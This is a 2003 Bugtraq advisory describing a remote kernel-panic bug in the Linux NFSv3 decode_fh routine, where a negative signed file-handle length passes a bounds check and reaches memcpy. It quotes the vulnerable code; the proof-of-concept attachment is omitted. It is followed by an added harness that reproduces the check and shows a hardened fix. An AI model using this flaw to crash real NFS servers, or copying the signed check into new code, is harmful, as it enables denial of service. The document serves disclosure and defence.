Date: Tue, 29 Jul 2003 12:55:34 -0700 (PDT)
From: Jared Stanbrough
X-X-Sender: jareds@gere.odin.pdx.edu
To: bugtraq@securityfocus.com
Subject: Remote Linux Kernel < 2.4.21 DoS in XDR routine.

Hello all,

I have discovered a signed/unsigned issue in a routine responsible for
demarshalling XDR data for NFSv3 procedure calls. As far as I can tell,
this bug has existed since NFSv3 support was integrated. It has been
silently fixed in 2.4.21.

The bug is in the decode_fh routine of fs/nfsd/nfs3xdr.c under the kernel
source tree.

Vulnerable code:

    static inline u32 *
    decode_fh(u32 *p, struct svc_fh *fhp)
    {
            int size;                       /* signed length from the wire */
            fh_init(fhp, NFS3_FHSIZE);
            size = ntohl(*p++);
            if (size > NFS3_FHSIZE)         /* a negative size passes this */
                    return NULL;

            memcpy(&fhp->fh_handle.fh_base, p, size);
            fhp->fh_handle.fh_size = size;
            return p + XDR_QUADLEN(size);
    }

Here p points at a packet of attacker-controlled XDR data. If size is made
negative, the sanity check is passed and the malicious value is handed to
memcpy. Due to the behavior of the kernel's memcpy, this causes a very
large copy in kernel space, resulting in an instant kernel panic.

The attached code is a POC of this vulnerability. It requires that the
vulnerable host has an exported directory available to the attacker. This
is probably not the only way to manifest this bug, however.

If you have any questions, please feel free to contact me.
Cheers,
Jared Stanbrough

[Attachment: knfsd_dos.c (base64-encoded C source, omitted)]
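Added example, not the post's own code and not the kernel's: a user-space harness that reproduces only the signed length check from decode_fh (returning the size_t memcpy() would receive, without copying) beside a hardened decode that keeps the length unsigned and also bounds it by the XDR words actually present. struct fh_stub, vulnerable_memcpy_len, decode_fh_fixed and the two sample helpers are assumed names; the XDR words are constructed inline.

```c
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>

#define NFS3_FHSIZE 64                    /* max NFSv3 file handle bytes */
#define XDR_QUADLEN(len) (((len) + 3) >> 2)

struct fh_stub {                          /* stand-in for struct svc_fh */
    unsigned char base[NFS3_FHSIZE];
    unsigned int size;
};
/* The 2.4.20 length check only (no copy): signed compare, so a negative
 * length passes. Returns the size_t memcpy() would receive, 0 if rejected. */
size_t vulnerable_memcpy_len(uint32_t wire_word)
{
    int size = (int)ntohl(wire_word);     /* signed, as in the original */
    if (size > NFS3_FHSIZE) return 0;     /* -1 is not > 64, so it passes */
    return (size_t)size;                  /* -1 converts to SIZE_MAX */
}

/* Hardened decode: unsigned length bounded by NFS3_FHSIZE and by nwords. */
const uint32_t *decode_fh_fixed(const uint32_t *p, size_t nwords, struct fh_stub *fhp)
{
    if (nwords < 1)
        return NULL;
    uint32_t size = ntohl(*p++);
    if (size > NFS3_FHSIZE || XDR_QUADLEN(size) > nwords - 1)
        return NULL;                      /* 0xffffffff is rejected here */
    memcpy(fhp->base, p, size);
    fhp->size = size;
    return p + XDR_QUADLEN(size);
}

/* Constructed sample: length word 0xffffffff (-1 as a signed int). */
int fixed_rejects_negative_len(void)
{
    struct fh_stub fh;
    uint32_t words[3] = { htonl(0xffffffffu), 0, 0 };
    return decode_fh_fixed(words, 3, &fh) == NULL;
}

/* Constructed sample: 8-byte handle "ABCDEFGH" carried in two XDR words. */
int fixed_accepts_valid_handle(void)
{
    struct fh_stub fh;
    uint32_t words[3] = { htonl(8), htonl(0x41424344u), htonl(0x45464748u) };
    const uint32_t *end = decode_fh_fixed(words, 3, &fh);
    return end == words + 3 && fh.size == 8 && memcmp(fh.base, "ABCDEFGH", 8) == 0;
}
```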